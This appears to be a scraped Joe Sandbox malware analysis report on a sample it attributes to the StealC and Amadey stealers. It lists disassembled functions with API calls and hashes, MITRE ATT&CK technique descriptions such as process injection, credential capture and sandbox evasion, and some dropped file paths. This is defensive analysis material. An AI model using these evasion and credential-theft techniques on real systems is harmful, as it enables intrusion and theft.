Instruction Fuzzy Hash: 3C01A7B9640214E6CF14E795CA21EFEBBA8DB11340B540415BC0373281EA209F189671

Function 00DB1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00DB1DD3

Strings

ListBox, xrefs: 00DB1DA0
ComboBox, xrefs: 00DB1D75

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c86d923c40f416ca3362d0566a4ae3aaf9cac46f09f0ea2423b35f41fe7b0ab4
Instruction ID: 5818137273f901f56729e8276b865ada133951843cdcdbdbedc4f06ba76a4d3e
Opcode Fuzzy Hash: c86d923c40f416ca3362d0566a4ae3aaf9cac46f09f0ea2423b35f41fe7b0ab4
Instruction Fuzzy Hash: 39F08175A51314E6DB14A7A4CC62EFEB768EB11350F940919BC63672C2DA70990C8270

Function 00DE8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E23018,00E2305C), ref: 00DE81BF
CloseHandle.KERNEL32 ref: 00DE81D1

Strings

\0, xrefs: 00DE818A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0
API String ID: 3712363035-3218720685
Opcode ID: f41c34943f9c47c6caa327ea478243c282c55a16b50de41a31d1bf69cc07f80a
Instruction ID: cba6c09d37d2f7188a9adba59e69e137416021306d3eb8134083fcd7ff3b5e64
Opcode Fuzzy Hash: f41c34943f9c47c6caa327ea478243c282c55a16b50de41a31d1bf69cc07f80a
Instruction Fuzzy Hash: 3DF082B1640350BEE3207772AC46FB73A5CEB05751F004424BB4CE91A2D67D8E059BF8

Function 00DD747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DD7493
_wcslen.LIBCMT ref: 00DD74B9

Strings

3, 3, 16, 1, xrefs: 00DD7483

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: bd613eb22cc8d0bdebc73dc4e7c17a29308750e8b67a1feba929658bf66e58aa
Instruction ID: 0c0081114d4122bdd4484bd56494274491a1a6504f8ba6ef5ee002fb0ff76e46
Opcode Fuzzy Hash: bd613eb22cc8d0bdebc73dc4e7c17a29308750e8b67a1feba929658bf66e58aa
Instruction Fuzzy Hash: 44E02B122043201192331279DCC197F5689CFC5760714186FFA89C2366FB948D9193B1

Function 00DB0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DB0B23

Strings

AutoIt, xrefs: 00DB0B17
Error allocating memory., xrefs: 00DB0B1C

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 755728b91c97cee360dd7cb11b71fd4869435d7d2c416fe70298ff0321484ed7
Instruction ID: 2775e1c24c21969304da08965c7ae233038436ef7ae45843035a6e84578addf6
Opcode Fuzzy Hash: 755728b91c97cee360dd7cb11b71fd4869435d7d2c416fe70298ff0321484ed7
Instruction Fuzzy Hash: 6DE0D8322843486BD21537557C03FC97E84CF05B21F100426FF58955C3CBE2689006B9

Function 00D70D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00D6F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D70D71,?,?,?,00D5100A), ref: 00D6F7CE

IsDebuggerPresent.KERNEL32(?,?,?,00D5100A), ref: 00D70D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D5100A), ref: 00D70D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D70D7F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: c729ab452396e63318835b80879bdb20427c02cf7f0c2d3e88d2efd943b55364
Instruction ID: 024dbd55c12e0f0164fdc52db44bd9f0ae45c9d8511419c13a5d10d5131e1298
Opcode Fuzzy Hash: c729ab452396e63318835b80879bdb20427c02cf7f0c2d3e88d2efd943b55364
Instruction Fuzzy Hash: D8E06D702007918FD330AFB9E4443427FE0EB10B45F04896DE886CAB91EBB0E4498BB1

Function 00D6E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D6E3D5

Strings

0%, xrefs: 00D6E3B5
8%, xrefs: 00D6E3CA

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%$8%
API String ID: 1385522511-2949748613
Opcode ID: 8343d5d9c35d9c974fc63878709101743e1494289b0a2f5ed6b00ea4e0c128e0
Instruction ID: 1d0e91ac54cc2087b25dcf94342e189dec56b7a1cf7af2e242432d35997bbf29
Opcode Fuzzy Hash: 8343d5d9c35d9c974fc63878709101743e1494289b0a2f5ed6b00ea4e0c128e0
Instruction Fuzzy Hash: 29E02635880A20EFC614A71DF855A883351EF49321B90D16CE602AB2D1EB342846867A

Function 00DC3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DC302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00DC3044

Strings

aut, xrefs: 00DC3038

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: b9d2f139e64f7d02acce33dbb9077bfd52e353440481ab42ee346033b049f4f4
Instruction ID: f791fd0a453f6366947d57bd08361d29b26add7aa411691c881161aff3d85329
Opcode Fuzzy Hash: b9d2f139e64f7d02acce33dbb9077bfd52e353440481ab42ee346033b049f4f4
Instruction Fuzzy Hash: E0D05E7290032867DA20A7A4AC4EFCB3A6CEB05751F0002A1BB55E6191DAB09985CAE4

Function 00DAD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00DAD220

Strings

X64, xrefs: 00DAD2A8
%.3d, xrefs: 00DAD22B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 62451f2276c387be11fb1e2ac8334e7c899b5145f54b640949658e0329ba1771
Instruction ID: db239eac5b319d6d39fbf0826374917b944209a75e7ec02bca261aab55414021
Opcode Fuzzy Hash: 62451f2276c387be11fb1e2ac8334e7c899b5145f54b640949658e0329ba1771
Instruction Fuzzy Hash: CDD012B1C08209EACB5097D0DC45AF9B37DFB0A301F508452F997E1440D634C548E775

Function 00DE2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE236C
PostMessageW.USER32(00000000), ref: 00DE2373

Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3

Strings

Shell_TrayWnd, xrefs: 00DE2365

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7eb64cb5b014aab2f93f3fa17c028f4b8d1423b1198176b93045442812782c38
Instruction ID: 6ace39208ff3ce88a5c48aadb767f44b3232d52bf10fbdda0e1c007a50b1eeac
Opcode Fuzzy Hash: 7eb64cb5b014aab2f93f3fa17c028f4b8d1423b1198176b93045442812782c38
Instruction Fuzzy Hash: F1D0C936391350BBE664B7709C4FFCA66149B04B10F0059167646EA2E0C9A0B8468A64

Function 00DE2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DE233F

Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3

Strings

Shell_TrayWnd, xrefs: 00DE2325

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 75a4b4a2c53dcb9df7ff376b68a5d15fee8079c549cdc9bdacf026ff682d0949
Instruction ID: e602632b255da90fc2ebd1924c702f4a40f10a651cada688287d71cc2d178ff3
Opcode Fuzzy Hash: 75a4b4a2c53dcb9df7ff376b68a5d15fee8079c549cdc9bdacf026ff682d0949
Instruction Fuzzy Hash: 37D0C9363A5350BBE664B7709C4FFCA6A149B00B10F005916764AEA2E0C9A0A8468A64

Function 00D8BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D8BE93
GetLastError.KERNEL32 ref: 00D8BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8BEFC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: d85244668c5ac5c15b92c28fe5a5c15da8ab9eb78035d85d4a9d9d83da2a0a68
Instruction ID: 3350abcd07f1f0050b69c248e7b8a818dca59e601575deeffc302766793ae882
Opcode Fuzzy Hash: d85244668c5ac5c15b92c28fe5a5c15da8ab9eb78035d85d4a9d9d83da2a0a68
Instruction Fuzzy Hash: 2B41B735605206AFCF32AF65CC44ABE7BA5EF41730F18416AFA599B1A1DB318D01CB70

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pud8g3zixE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3b8764e7-c4d0-4d25-af5c-5bb5631f7887.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\43fcd665-ee27-4fa3-a308-4d76d4b7f7a2.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4d6e226b-8d2b-44a0-b710-4bf3fb9c02a9.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\7d046ee2-01bd-4db7-8152-fed2d5fb046d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

